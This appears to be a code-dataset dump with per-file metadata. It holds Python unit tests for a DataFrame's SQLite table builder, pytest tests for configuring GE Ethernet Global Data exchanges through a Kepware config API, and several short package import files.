        df._build_sqlite3_tbl(list(df.keys())[:2])
        df._execute('select * from TBL')
        for i,(a,b) in enumerate(df.cur):
            self.assertEqual(a,df[1][i])
            self.assertEqual(b,df[2][i])

    def test2(self):
        """test with string keys and tuple where condition"""
        # column '4' is NOT shuffled, so its first 50 rows are 'bob';
        # the where condition filters those out and only rows 50..99 remain
        df=DataFrame()
        df['1']=list(range(100))
        df['2']=['bob' for i in range(100)]
        df['3']=[i*1.234232 for i in range(100)]
        df['4']=['bob' for i in range(50)]+list(range(50))
        shuffle(df['1'])
        shuffle(df['2'])
        shuffle(df['3'])
        df._build_sqlite3_tbl(list(df.keys())[:2], [('4','not in',['bob'])])
        df._execute('select * from TBL')
        for i,(a,b) in enumerate(df.cur):
            self.assertEqual(a,df['1'][i+50])
            self.assertEqual(b,df['2'][i+50])

    def test21(self):
        """test with string keys and tuple where condition"""
        # same as test2 but with integer keys in the tuple condition
        df=DataFrame()
        df[1]=list(range(100))
        df[2]=['bob' for i in range(100)]
        df[3]=[i*1.234232 for i in range(100)]
        df[4]=['bob' for i in range(50)]+list(range(50))
        shuffle(df[1])
        shuffle(df[2])
        shuffle(df[3])
        df._build_sqlite3_tbl(list(df.keys())[:2], [(4,'not in',['bob'])])
        df._execute('select * from TBL')
        for i,(a,b) in enumerate(df.cur):
            self.assertEqual(a,df[1][i+50])
            self.assertEqual(b,df[2][i+50])

    def test22(self):
        """test with string keys and where condition"""
        # the where condition is given as a raw SQL string fragment
        df=DataFrame()
        df['1']=list(range(100))
        df['2']=['bob' for i in range(100)]
        df['3']=[i*1.234232 for i in range(100)]
        df['4']=['bob' for i in range(50)]+list(range(50))
        shuffle(df['1'])
        shuffle(df['2'])
        shuffle(df['3'])
        df._build_sqlite3_tbl(list(df.keys())[:2], ['4 not in ("bob")'])
        df._execute('select * from TBL')
        for i,(a,b) in enumerate(df.cur):
            self.assertEqual(a,df['1'][i+50])
            self.assertEqual(b,df['2'][i+50])

    def test3(self):
        """test with string keys and tuple where condition"""
        df=DataFrame()
        df[1]=list(range(100))
        df[2]=['bob' for i in range(100)]
        df[3]=[i*1.234232 for i in range(100)]
        df[4]=['bob' for i in range(50)]+list(range(50))
        shuffle(df[1])
        shuffle(df[2])
        shuffle(df[3])
        df._build_sqlite3_tbl(list(df.keys())[:2], [(4,'!=','bob')])
        df._execute('select * from TBL')
        for i,(a,b) in enumerate(df.cur):
            self.assertEqual(a,df[1][i+50])
            self.assertEqual(b,df[2][i+50])

    def test31(self):
        """string where-clause naming '4' while the keys are ints raises KeyError"""
        df=DataFrame()
        df[1]=list(range(100))
        df[2]=['bob' for i in range(100)]
        df[3]=[i*1.234232 for i in range(100)]
        df[4]=['bob' for i in range(50)]+list(range(50))
        shuffle(df[1])
        shuffle(df[2])
        shuffle(df[3])
        with self.assertRaises(KeyError) as cm:
            df._build_sqlite3_tbl(list(df.keys())[:2], ['4 != "bob"'])
        self.assertEqual(str(cm.exception),
                         "'4'")

    def test4(self):
        """a non-iterable where argument raises TypeError"""
        df=DataFrame()
        df[1]=list(range(100))
        df[2]=['bob' for i in range(100)]
        df[3]=[i*1.234232 for i in range(100)]
        df[4]=['bob' for i in range(50)]+list(range(50))
        with self.assertRaises(TypeError) as cm:
            df._build_sqlite3_tbl(list(df.keys())[:2], 42)
        self.assertEqual(str(cm.exception),
                         "'int' object is not iterable")
def suite():
    """Assemble this module's tests into a single TestSuite."""
    tests = unittest.makeSuite(Test__build_sqlite3_tbl)
    return unittest.TestSuite(tests)
if __name__ == "__main__":
    # run the whole suite when executed as a script
    unittest.TextTestRunner().run(suite())
| 29.987069
| 76
| 0.512434
| 1,019
| 6,957
| 3.439647
| 0.118744
| 0.043367
| 0.085592
| 0.094151
| 0.80428
| 0.769472
| 0.76234
| 0.76234
| 0.762054
| 0.762054
| 0
| 0.076923
| 0.301136
| 6,957
| 231
| 77
| 30.116883
| 0.643974
| 0.073164
| 0
| 0.634731
| 0
| 0
| 0.049406
| 0
| 0
| 0
| 0
| 0
| 0.155689
| 1
| 0.065868
| false
| 0
| 0.047904
| 0.005988
| 0.125749
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c52f144df1276663726e2afdc91e4c778f1100ae
| 14,870
|
py
|
Python
|
tests/egd_test.py
|
PTCInc/Kepware-ConfigAPI-SDK-Python
|
ff7757492a7ea1e73f3d5862ba956c8af4dcc797
|
[
"MIT"
] | 9
|
2020-04-08T18:48:03.000Z
|
2022-03-18T15:05:01.000Z
|
tests/egd_test.py
|
PTCInc/Kepware-ConfigAPI-SDK-Python
|
ff7757492a7ea1e73f3d5862ba956c8af4dcc797
|
[
"MIT"
] | 5
|
2020-08-24T15:08:54.000Z
|
2022-03-16T17:07:09.000Z
|
tests/egd_test.py
|
PTCInc/Kepware-ConfigAPI-SDK-Python
|
ff7757492a7ea1e73f3d5862ba956c8af4dcc797
|
[
"MIT"
] | 10
|
2020-03-23T20:40:17.000Z
|
2021-11-14T08:42:56.000Z
|
# -------------------------------------------------------------------------
# Copyright (c) PTC Inc. All rights reserved.
# See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# EGD Test - Test to exersice all GE EGD driver exchange related features
# including, exchanges, ranges and name resolutions
import os, sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import kepconfig
import kepconfig.connectivity
import time
import datetime
import pytest
# import connectivity, admin, iot_gateway, datalogger
# Channel and Device name to be used
ch_name = 'EGD'
dev_name = 'Device1'

# Consumer exchange payload: exchange id "0", consuming from producer
# 192.168.1.130 (group 1) every 1000 ms with a 10 s update timeout.
consumer_exchange = {
    "common.ALLTYPES_NAME": "0",
    "common.ALLTYPES_DESCRIPTION": "",
    "ge_ethernet_global_data.CONSUMER_EXCHANGE_ID": 0,
    "ge_ethernet_global_data.CONSUMER_EXCHANGE_NUMBER": 1,
    "ge_ethernet_global_data.CONSUMER_EXCHANGE_PRODUCER_ID": "192.168.1.130",
    "ge_ethernet_global_data.CONSUMER_EXCHANGE_GROUP_ID": 1,
    "ge_ethernet_global_data.CONSUMER_EXCHANGE_CONSUMED_PERIOD_MS": 1000,
    "ge_ethernet_global_data.CONSUMER_EXCHANGE_UPDATE_TIMEOUT_MS": 10000
}

# Second consumer exchange (id/number 10) — same producer and timing.
consumer_exchange10 = {
    "common.ALLTYPES_NAME": "10",
    "common.ALLTYPES_DESCRIPTION": "",
    "ge_ethernet_global_data.CONSUMER_EXCHANGE_ID": 10,
    "ge_ethernet_global_data.CONSUMER_EXCHANGE_NUMBER": 10,
    "ge_ethernet_global_data.CONSUMER_EXCHANGE_PRODUCER_ID": "192.168.1.130",
    "ge_ethernet_global_data.CONSUMER_EXCHANGE_GROUP_ID": 1,
    "ge_ethernet_global_data.CONSUMER_EXCHANGE_CONSUMED_PERIOD_MS": 1000,
    "ge_ethernet_global_data.CONSUMER_EXCHANGE_UPDATE_TIMEOUT_MS": 10000
}

# Producer exchange payload: exchange id "0", producing every 10 ms to
# consumed address 10.10.10.10 (CONSUMED_TYPE 1 with empty NAME field).
producer_exchange = {
    "common.ALLTYPES_NAME": "0",
    "common.ALLTYPES_DESCRIPTION": "",
    "ge_ethernet_global_data.PRODUCER_EXCHANGE_ID": 0,
    "ge_ethernet_global_data.PRODUCER_EXCHANGE_NUMBER": 0,
    "ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_TYPE": 1,
    'ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_ADDRESS_GROUP_ID':0,
    "ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_ADDRESS_IP": "10.10.10.10",
    'ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_ADDRESS_NAME': '',
    "ge_ethernet_global_data.PRODUCER_EXCHANGE_PRODUCER_INTERVAL_MS": 10
}

# Second producer exchange (id/number 10) — same target and interval.
producer_exchange10 = {
    "common.ALLTYPES_NAME": "10",
    "common.ALLTYPES_DESCRIPTION": "",
    "ge_ethernet_global_data.PRODUCER_EXCHANGE_ID": 10,
    "ge_ethernet_global_data.PRODUCER_EXCHANGE_NUMBER": 10,
    "ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_TYPE": 1,
    'ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_ADDRESS_GROUP_ID':0,
    "ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_ADDRESS_IP": "10.10.10.10",
    'ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_ADDRESS_NAME': '',
    "ge_ethernet_global_data.PRODUCER_EXCHANGE_PRODUCER_INTERVAL_MS": 10
}

# Two range definitions used by the range-related tests.
range1 = {
    "common.ALLTYPES_NAME": "Range_0",
    "common.ALLTYPES_DESCRIPTION": "",
    "ge_ethernet_global_data.RANGE_INDEX": 1,
    "ge_ethernet_global_data.RANGE_OFFSET": 0,
    "ge_ethernet_global_data.RANGE_REFERENCE": 0,
    "ge_ethernet_global_data.RANGE_LOW_POINT": 0,
    "ge_ethernet_global_data.RANGE_HIGH_POINT": 8
}

range2 = {
    "common.ALLTYPES_NAME": "Range_1",
    "common.ALLTYPES_DESCRIPTION": "",
    "ge_ethernet_global_data.RANGE_INDEX": 2,
    "ge_ethernet_global_data.RANGE_OFFSET": 18,
    "ge_ethernet_global_data.RANGE_REFERENCE": 6,
    "ge_ethernet_global_data.RANGE_LOW_POINT": 0,
    "ge_ethernet_global_data.RANGE_HIGH_POINT": 10
}

# Two name-resolution entries mapping PLC aliases to IP addresses.
name1 = {
    "common.ALLTYPES_NAME": "PLC1",
    "common.ALLTYPES_DESCRIPTION": "",
    "ge_ethernet_global_data.NAME_RESOLUTION_ALIAS": "PLC1",
    "ge_ethernet_global_data.NAME_RESOLUTION_IP_ADDRESS": "192.168.1.200"
}

name2 = {
    "common.ALLTYPES_NAME": "PLC2",
    "common.ALLTYPES_DESCRIPTION": "",
    "ge_ethernet_global_data.NAME_RESOLUTION_ALIAS": "PLC2",
    "ge_ethernet_global_data.NAME_RESOLUTION_IP_ADDRESS": "192.168.1.201"
}
def HTTPErrorHandler(err):
    """Print the details of a Kepware HTTP error.

    Any other exception type is reported with a generic one-line
    message instead.
    """
    if err.__class__ is not kepconfig.error.KepHTTPError:
        print('Different Exception Received: {}'.format(err))
        return
    # Dump each piece of the HTTP error on its own line.
    for part in (err.code, err.msg, err.url, err.hdrs, err.payload):
        print(part)
# Channel + device definition used by the module fixture: the nested
# "devices" list creates Device1 under the EGD channel, both using the
# "GE Ethernet Global Data" driver.
egd_device = {
    "common.ALLTYPES_NAME": ch_name,
    "servermain.MULTIPLE_TYPES_DEVICE_DRIVER": "GE Ethernet Global Data",
    "devices": [{
        "common.ALLTYPES_NAME": dev_name,
        "servermain.MULTIPLE_TYPES_DEVICE_DRIVER": "GE Ethernet Global Data"
    }]
}
def initialize(server):
    """Module setup: skip all tests unless the EGD driver is installed
    and the test channel/device can be created.

    Args:
        server: a kepconfig server connection object.
    """
    try:
        # Probe the driver-specific doc endpoint; failure means the GE
        # Ethernet Global Data driver is not installed on this server.
        server._config_get(server.url + "/doc/drivers/GE Ethernet Global Data/channels")
    except Exception:
        pytest.skip("EGD Driver is not installed", allow_module_level=True)
    try:
        # BUG FIX: the original discarded the add_channel result with a
        # no-op `== True` comparison; a falsy return now also skips.
        if not kepconfig.connectivity.channel.add_channel(server, egd_device):
            pytest.skip("Device Configuration couldn't be added", allow_module_level=True)
    except Exception:
        pytest.skip("Device Configuration couldn't be added", allow_module_level=True)
def complete(server):
    """Module teardown: delete the channel created by initialize().

    HTTP failures are reported via HTTPErrorHandler rather than raised.
    """
    channel_name = egd_device['common.ALLTYPES_NAME']
    try:
        kepconfig.connectivity.channel.del_channel(server, channel_name)
    except Exception as err:
        HTTPErrorHandler(err)
@pytest.fixture(scope="module")
def server(kepware_server):
    """Module-scoped fixture: create the EGD test channel, hand the
    server to the tests, then tear the channel down afterwards."""
    initialize(kepware_server)
    # Everything after the yield runs once the module's tests finish.
    yield kepware_server
    complete(kepware_server)
def remove_projectid(DATA):
    """Strip 'PROJECT_ID' keys from API responses, in place.

    Generalized to recurse through arbitrarily nested lists (the
    original handled at most lists-of-lists and crashed on deeper
    nesting); behavior on dicts, flat lists, and two-level lists is
    unchanged.

    Args:
        DATA: a dict, a (possibly nested) list of dicts, or any other
            value (returned untouched).

    Returns:
        The same object, mutated in place with 'PROJECT_ID' removed
        from every dict found.
    """
    if isinstance(DATA, dict):
        DATA.pop('PROJECT_ID', None)
    elif isinstance(DATA, list):
        for item in DATA:
            remove_projectid(item)
    return DATA
# Exchange Tests
def create_exchange(server, exchange_type, exchanges):
    """Exercise the add/delete paths for exchanges: single add, delete, bulk add."""
    device_path = ch_name + '.' + dev_name
    first = exchanges[0]
    # Add one exchange, remove it again, then add the full list in one call.
    assert kepconfig.connectivity.egd.exchange.add_exchange(server, device_path, exchange_type, first)
    assert kepconfig.connectivity.egd.exchange.del_exchange(server, device_path, exchange_type, first['common.ALLTYPES_NAME'])
    assert kepconfig.connectivity.egd.exchange.add_exchange(server, device_path, exchange_type, exchanges)
def get_exchange(server, exchange_type, exchanges):
    """Verify that single, per-type and per-device exchange reads round-trip.

    ``get_all_exchanges`` returns ``[consumer_list, producer_list]``, so the
    expected value depends on which exchange type was populated.
    """
    device_path = ch_name + '.' + dev_name
    # Get a specific Exchange.
    ret = kepconfig.connectivity.egd.exchange.get_exchange(server, device_path, exchange_type, exchanges[0]['common.ALLTYPES_NAME'])
    assert isinstance(ret, dict), 'Unexpected data type return. {}'.format(type(ret))
    assert remove_projectid(ret) == exchanges[0]
    # Get all exchanges for the exchange type.
    ret = kepconfig.connectivity.egd.exchange.get_exchange(server, device_path, exchange_type)
    assert isinstance(ret, list), 'Unexpected data type return. {}'.format(type(ret))
    assert remove_projectid(ret) == exchanges
    # Get all exchanges for the device (both types); the original bare assert
    # now carries the same diagnostic message as the others.
    ret = kepconfig.connectivity.egd.exchange.get_all_exchanges(server, device_path)
    assert isinstance(ret, list), 'Unexpected data type return. {}'.format(type(ret))
    if exchange_type == kepconfig.connectivity.egd.PRODUCER_EXCHANGE:
        assert remove_projectid(ret) == [[], exchanges]
    else:
        assert remove_projectid(ret) == [exchanges, []]
def modify_exchange(server, exchange_type, exchange_name):
    """Modify an exchange by explicit name, by in-payload name, and with force."""
    device_path = ch_name + '.' + dev_name
    modify = kepconfig.connectivity.egd.exchange.modify_exchange
    assert modify(server, device_path, exchange_type,
                  {"ge_ethernet_global_data.CONSUMER_EXCHANGE_NUMBER": 2}, exchange_name)
    assert modify(server, device_path, exchange_type,
                  {"common.ALLTYPES_NAME": exchange_name, "ge_ethernet_global_data.CONSUMER_EXCHANGE_NUMBER": 3})
    assert modify(server, device_path, exchange_type,
                  {"common.ALLTYPES_NAME": exchange_name, "ge_ethernet_global_data.CONSUMER_EXCHANGE_NUMBER": 4}, force=True)
def delete_exchange(server, exchange_type, exchange_name):
    """Delete a single exchange and assert the call succeeded."""
    device_path = ch_name + '.' + dev_name
    assert kepconfig.connectivity.egd.exchange.del_exchange(server, device_path, exchange_type, exchange_name)
# Exchange Range tests
def create_range(server, exchange_type, exchange_name, ranges):
    """Exercise the add/delete paths for ranges: single add, delete, bulk add."""
    device_path = ch_name + '.' + dev_name
    first = ranges[0]
    # Add one range, remove it again, then add the full list in one call.
    assert kepconfig.connectivity.egd.range.add_range(server, device_path, exchange_type, exchange_name, first)
    assert kepconfig.connectivity.egd.range.del_range(server, device_path, exchange_type, exchange_name, first['common.ALLTYPES_NAME'])
    assert kepconfig.connectivity.egd.range.add_range(server, device_path, exchange_type, exchange_name, ranges)
def get_range(server, exchange_type, exchange_name, ranges):
    """Verify that single and per-exchange range reads round-trip."""
    device_path = ch_name + '.' + dev_name
    # Get a specific range.
    ret = kepconfig.connectivity.egd.range.get_range(server, device_path, exchange_type, exchange_name, ranges[0]['common.ALLTYPES_NAME'])
    assert isinstance(ret, dict), 'Unexpected data type return. {}'.format(type(ret))
    assert remove_projectid(ret) == ranges[0]
    # Get all ranges for the exchange.
    ret = kepconfig.connectivity.egd.range.get_range(server, device_path, exchange_type, exchange_name)
    assert isinstance(ret, list), 'Unexpected data type return. {}'.format(type(ret))
    assert remove_projectid(ret) == ranges
def modify_range(server, exchange_type, exchange_name, range_name):
    """Modify a range by explicit name, by in-payload name, and with force."""
    device_path = ch_name + '.' + dev_name
    modify = kepconfig.connectivity.egd.range.modify_range
    assert modify(server, device_path, exchange_type, exchange_name,
                  {"ge_ethernet_global_data.RANGE_HIGH_POINT": 10}, range_name)
    assert modify(server, device_path, exchange_type, exchange_name,
                  {"common.ALLTYPES_NAME": range_name, "ge_ethernet_global_data.RANGE_HIGH_POINT": 11})
    assert modify(server, device_path, exchange_type, exchange_name,
                  {"common.ALLTYPES_NAME": range_name, "ge_ethernet_global_data.RANGE_HIGH_POINT": 8}, force=True)
def delete_range(server, exchange_type, exchange_name, range_name):
    """Delete a single range and assert the call succeeded."""
    device_path = ch_name + '.' + dev_name
    assert kepconfig.connectivity.egd.range.del_range(server, device_path, exchange_type, exchange_name, range_name)
# Name Resolution Tests
def create_name(server, names):
    """Exercise the add/delete paths for name resolutions: single add, delete, bulk add."""
    device_path = ch_name + '.' + dev_name
    first = names[0]
    # Add one name resolution, remove it again, then add the full list.
    assert kepconfig.connectivity.egd.name.add_name_resolution(server, device_path, first)
    assert kepconfig.connectivity.egd.name.del_name_resolution(server, device_path, first['common.ALLTYPES_NAME'])
    assert kepconfig.connectivity.egd.name.add_name_resolution(server, device_path, names)
def get_name(server, names):
    """Verify that single and list reads of name-resolution entries round-trip.

    (The original comments said "range" — these are name resolutions.)
    """
    device_path = ch_name + '.' + dev_name
    # Get a specific name resolution.
    ret = kepconfig.connectivity.egd.name.get_name_resolution(server, device_path, names[0]['common.ALLTYPES_NAME'])
    assert isinstance(ret, dict), 'Unexpected data type return. {}'.format(type(ret))
    assert remove_projectid(ret) == names[0]
    # Get all name resolutions for the device.
    ret = kepconfig.connectivity.egd.name.get_name_resolution(server, device_path)
    assert isinstance(ret, list), 'Unexpected data type return. {}'.format(type(ret))
    assert remove_projectid(ret) == names
def modify_name(server, name):
    """Modify a name resolution by explicit name, by in-payload name, and with force."""
    device_path = ch_name + '.' + dev_name
    modify = kepconfig.connectivity.egd.name.modify_name_resolution
    assert modify(server, device_path,
                  {"ge_ethernet_global_data.NAME_RESOLUTION_IP_ADDRESS": '192.168.1.50'}, name)
    assert modify(server, device_path,
                  {"common.ALLTYPES_NAME": name, "ge_ethernet_global_data.NAME_RESOLUTION_IP_ADDRESS": '192.168.1.100'})
    assert modify(server, device_path,
                  {"common.ALLTYPES_NAME": name, "ge_ethernet_global_data.NAME_RESOLUTION_IP_ADDRESS": '192.168.1.202'}, force=True)
def delete_name(server, name):
    """Delete a single name resolution and assert the call succeeded."""
    device_path = ch_name + '.' + dev_name
    assert kepconfig.connectivity.egd.name.del_name_resolution(server, device_path, name)
#
# MAIN TEST SET
#
def test_consumer_exchange(server):
    """End-to-end CRUD flow for consumer exchanges and their ranges."""
    consumer = kepconfig.connectivity.egd.CONSUMER_EXCHANGE
    exchange_name = consumer_exchange['common.ALLTYPES_NAME']
    range_name = range1['common.ALLTYPES_NAME']
    create_exchange(server, consumer, [consumer_exchange, consumer_exchange10])
    get_exchange(server, consumer, [consumer_exchange, consumer_exchange10])
    # Range tests run against the first exchange.
    create_range(server, consumer, exchange_name, [range1, range2])
    get_range(server, consumer, exchange_name, [range1, range2])
    modify_range(server, consumer, exchange_name, range_name)
    delete_range(server, consumer, exchange_name, range_name)
    modify_exchange(server, consumer, exchange_name)
    delete_exchange(server, consumer, exchange_name)
    delete_exchange(server, consumer, consumer_exchange10['common.ALLTYPES_NAME'])
def test_producer_exchange(server):
    """End-to-end CRUD flow for producer exchanges and their ranges."""
    producer = kepconfig.connectivity.egd.PRODUCER_EXCHANGE
    exchange_name = producer_exchange['common.ALLTYPES_NAME']
    range_name = range1['common.ALLTYPES_NAME']
    create_exchange(server, producer, [producer_exchange, producer_exchange10])
    get_exchange(server, producer, [producer_exchange, producer_exchange10])
    # Range tests run against the first exchange.
    create_range(server, producer, exchange_name, [range1, range2])
    get_range(server, producer, exchange_name, [range1, range2])
    modify_range(server, producer, exchange_name, range_name)
    delete_range(server, producer, exchange_name, range_name)
    modify_exchange(server, producer, exchange_name)
    delete_exchange(server, producer, exchange_name)
    delete_exchange(server, producer, producer_exchange10['common.ALLTYPES_NAME'])
def test_name_resolutions(server):
    """End-to-end CRUD flow for name-resolution entries."""
    alias = name1['common.ALLTYPES_NAME']
    create_name(server, [name1, name2])
    get_name(server, [name1, name2])
    modify_name(server, alias)
    delete_name(server, alias)
| 47.206349
| 152
| 0.742367
| 1,877
| 14,870
| 5.559403
| 0.103356
| 0.049832
| 0.079732
| 0.099665
| 0.81955
| 0.790034
| 0.758026
| 0.732726
| 0.710014
| 0.691711
| 0
| 0.01618
| 0.135508
| 14,870
| 315
| 153
| 47.206349
| 0.795566
| 0.071083
| 0
| 0.254545
| 0
| 0
| 0.302505
| 0.196298
| 0
| 0
| 0
| 0
| 0.163636
| 1
| 0.090909
| false
| 0
| 0.027273
| 0
| 0.122727
| 0.027273
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3d79c359112f09fc22957fc7a430fa909d19ae6c
| 86
|
py
|
Python
|
projects/BUC/bucreid/__init__.py
|
weleen/MGH.pytorch
|
69f2830f6bd60fe3b33c80c04540c0c800d26de1
|
[
"Apache-2.0"
] | 4
|
2021-10-06T15:57:29.000Z
|
2021-12-21T12:46:19.000Z
|
projects/BUC/bucreid/__init__.py
|
weleen/MGH.pytorch
|
69f2830f6bd60fe3b33c80c04540c0c800d26de1
|
[
"Apache-2.0"
] | 1
|
2022-02-14T06:36:19.000Z
|
2022-02-24T08:18:39.000Z
|
projects/BUC/bucreid/__init__.py
|
weleen/MGH.pytorch
|
69f2830f6bd60fe3b33c80c04540c0c800d26de1
|
[
"Apache-2.0"
] | null | null | null |
from . import hooks
from .buc_head import BUCHead
from .buc_trainer import BUCTrainer
| 21.5
| 35
| 0.825581
| 13
| 86
| 5.307692
| 0.615385
| 0.202899
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139535
| 86
| 3
| 36
| 28.666667
| 0.932432
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3d9379f89599315d55e3696697c75c28944db226
| 73
|
py
|
Python
|
astra/models.py
|
BottleJia/Redis-astra
|
f27288c383ef4710c2a97416fc268242cdf95100
|
[
"MIT"
] | 87
|
2016-03-07T08:38:56.000Z
|
2021-11-12T11:42:34.000Z
|
astra/models.py
|
BottleJia/Redis-astra
|
f27288c383ef4710c2a97416fc268242cdf95100
|
[
"MIT"
] | 5
|
2016-03-10T20:49:28.000Z
|
2021-06-30T08:01:43.000Z
|
astra/models.py
|
BottleJia/Redis-astra
|
f27288c383ef4710c2a97416fc268242cdf95100
|
[
"MIT"
] | 6
|
2016-03-17T21:28:25.000Z
|
2021-07-29T05:49:59.000Z
|
from astra.model import Model # NOQA
from astra.fields import * # NOQA
| 24.333333
| 37
| 0.739726
| 11
| 73
| 4.909091
| 0.545455
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.191781
| 73
| 2
| 38
| 36.5
| 0.915254
| 0.123288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3ddf8abc9c69ec711d4eb128c3666c0bc922c405
| 29
|
py
|
Python
|
backend/src/viasp/__init__.py
|
glaserL/viasp
|
740cb13c9d71c76b9a702597083b5b75b5a5eafb
|
[
"MIT"
] | null | null | null |
backend/src/viasp/__init__.py
|
glaserL/viasp
|
740cb13c9d71c76b9a702597083b5b75b5a5eafb
|
[
"MIT"
] | 9
|
2022-03-15T12:10:58.000Z
|
2022-03-23T19:33:51.000Z
|
backend/src/viasp/__init__.py
|
glaserL/viasp
|
740cb13c9d71c76b9a702597083b5b75b5a5eafb
|
[
"MIT"
] | null | null | null |
from .wrapper import Control
| 14.5
| 28
| 0.827586
| 4
| 29
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 1
| 29
| 29
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9a8e9cb36657351164b3181435e91fb6a0f1efc0
| 639
|
py
|
Python
|
rl_environments/vrep/__init__.py
|
molomono/rl_environments
|
e625790cf27b7e8362859421a7fd937879f601e4
|
[
"MIT"
] | null | null | null |
rl_environments/vrep/__init__.py
|
molomono/rl_environments
|
e625790cf27b7e8362859421a7fd937879f601e4
|
[
"MIT"
] | null | null | null |
rl_environments/vrep/__init__.py
|
molomono/rl_environments
|
e625790cf27b7e8362859421a7fd937879f601e4
|
[
"MIT"
] | null | null | null |
from rl_environments.vrep.cartpole_vrep_env import CartPoleVrepEnv
from rl_environments.vrep.cartpole_continuous_vrep_env import CartPoleContinuousVrepEnv
from rl_environments.vrep.hopper_vrep_env import HopperVrepEnv
from rl_environments.vrep.balancebot_vrep_env import BalanceBotVrepEnv
from rl_environments.vrep.balancebot_vrep_env_noise import BalanceBotVrepEnvNoise
from rl_environments.vrep.balancebot_vrep_balance import BalanceBotVrepEnvBalance
from rl_environments.vrep.cartpole_continuous_swingup_vrep_env import DoubleCartPoleSwingupVrepEnv
from rl_environments.vrep.balancebot_vrep_locomotion import BalanceBotVrepEnvLocomotion
| 79.875
| 98
| 0.926448
| 76
| 639
| 7.421053
| 0.289474
| 0.085106
| 0.255319
| 0.312057
| 0.460993
| 0.407801
| 0.138298
| 0
| 0
| 0
| 0
| 0
| 0.048513
| 639
| 8
| 99
| 79.875
| 0.927632
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9ac857a9dbc818d09cd40df31f83a8c894332c6c
| 46
|
py
|
Python
|
continuum/transforms/__init__.py
|
oleksost/continuum
|
682d66540bfbfa171ac73281ed2989f9338e88bf
|
[
"MIT"
] | 282
|
2020-05-09T21:35:22.000Z
|
2022-03-20T11:29:41.000Z
|
continuum/transforms/__init__.py
|
oleksost/continuum
|
682d66540bfbfa171ac73281ed2989f9338e88bf
|
[
"MIT"
] | 180
|
2020-05-03T09:31:48.000Z
|
2022-03-30T12:12:48.000Z
|
continuum/transforms/__init__.py
|
oleksost/continuum
|
682d66540bfbfa171ac73281ed2989f9338e88bf
|
[
"MIT"
] | 34
|
2020-06-13T14:09:29.000Z
|
2022-03-14T14:05:07.000Z
|
from continuum.transforms import segmentation
| 23
| 45
| 0.891304
| 5
| 46
| 8.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 46
| 1
| 46
| 46
| 0.97619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9aef2d03f798ec7d186b9708f6569585b948b6ba
| 2,573
|
py
|
Python
|
src/test_type_checkers.py
|
jsphweid/annhouga
|
